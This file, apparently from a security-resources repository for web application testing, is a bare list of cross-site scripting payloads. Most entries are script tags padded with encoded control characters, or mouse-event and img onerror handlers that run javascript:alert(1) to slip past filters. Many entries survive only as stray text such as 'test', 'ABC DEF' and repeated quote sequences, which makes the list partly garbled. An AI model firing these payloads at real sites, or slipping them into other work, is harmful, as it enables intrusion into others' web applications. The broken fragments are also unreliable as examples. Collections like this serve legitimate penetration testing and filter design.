cyber-security-resources/web_application_testing/xss_vectors.md
2018-12-02 23:23:48 -05:00

45 KiB

A collection of XSS vectors

<script\x20type="text/javascript">javascript:alert(1); <script\x3Etype="text/javascript">javascript:alert(1); <script\x0Dtype="text/javascript">javascript:alert(1); <script\x09type="text/javascript">javascript:alert(1); <script\x0Ctype="text/javascript">javascript:alert(1); <script\x2Ftype="text/javascript">javascript:alert(1); <script\x0Atype="text/javascript">javascript:alert(1); '"><\x3Cscript>javascript:alert(1)</script> '"><\x00script>javascript:alert(1)

<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> <html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> <html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> <html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> <html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> <html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> <html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> \x3Cscript>javascript:alert(1) '"`> --> --> --> --> --> `"'>

test test test test test test test test test test test test test test "'`>ABC
DEF "'`>ABC
DEF '`"><\x3Cscript>javascript:alert(1) '`"><\x00script>javascript:alert(1) "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> "'`><\x00img src=xxx:x onerror=javascript:alert(1)> javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> "/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> "/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> "/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> "/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> "/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> "/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> "/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) `"'> `"'> `"'> `"'> `"'> `"'> `"'>